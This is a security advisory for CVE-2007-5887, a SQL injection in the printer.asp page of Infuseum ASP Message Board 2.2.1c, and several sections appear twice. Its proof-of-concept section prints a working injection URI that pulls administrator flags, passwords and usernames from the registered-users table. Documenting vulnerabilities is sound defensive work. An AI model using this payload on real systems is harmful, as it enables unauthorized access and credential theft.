ASP Message Board Printer.ASP SQL Injection Vulnerability
BID:26334
Info
ASP Message Board Printer.ASP SQL Injection Vulnerability
| Bugtraq ID: | 26334 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5887 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 05 2007 12:00AM |
| Updated: | Nov 15 2007 12:40AM |
| Credit: | Q7x is credited with the discovery of this vulnerability. |
| Vulnerable: |
Infuseum ASP Message Board 2.2.1 c |
| Not Vulnerable: | |
Discussion
ASP Message Board Printer.ASP SQL Injection Vulnerability
ASP Message Board is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP Message Board 2.2.1c is vulnerable; other versions may also be affected.
ASP Message Board is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP Message Board 2.2.1c is vulnerable; other versions may also be affected.
Exploit / POC
ASP Message Board Printer.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
Solution / Fix
ASP Message Board Printer.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
ASP Message Board Printer.ASP SQL Injection Vulnerability
References:
References:
- Infuseum ASP Message Board Home Page (Infuseum)